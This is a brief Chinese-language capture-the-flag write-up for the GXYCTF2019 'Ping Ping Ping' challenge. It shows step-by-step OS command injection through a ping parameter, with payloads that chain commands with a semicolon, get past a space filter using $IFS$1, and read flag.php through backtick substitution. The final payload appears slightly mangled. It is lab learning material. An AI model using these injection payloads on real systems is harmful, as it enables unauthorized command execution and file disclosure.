[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解題

Xxiaomaa發表於2024-11-06

開啟後,發現顯示一個 /?ip=
我們直接在url裡新增/?ip=127.0.0.1,發現有回顯,這時候就可以用分號來進行命令連結執行了。
輸入url/?ip=127.0.0.1;ls
回顯出來兩個php檔案!

直接構造payload:/?ip=127.0.0.1;cat /flag.php

才發現沒那麼簡單,回顯過濾了空格,可以使用$IFS$1來繞過空格,來進行檢視。
再次構造payload:/?ip=127.0.0.1;cat$IFS$1flag.php

發現還是被過濾了

直接先檢視index.php

過濾了很多很多

最後構造payload:/?ip=127.0.0.1;cat$IFS$1ls`` ---- ls用反引號包裹,鍵盤左上角esc下面

最後f12鍵檢視原始碼後即可得到flag

相關文章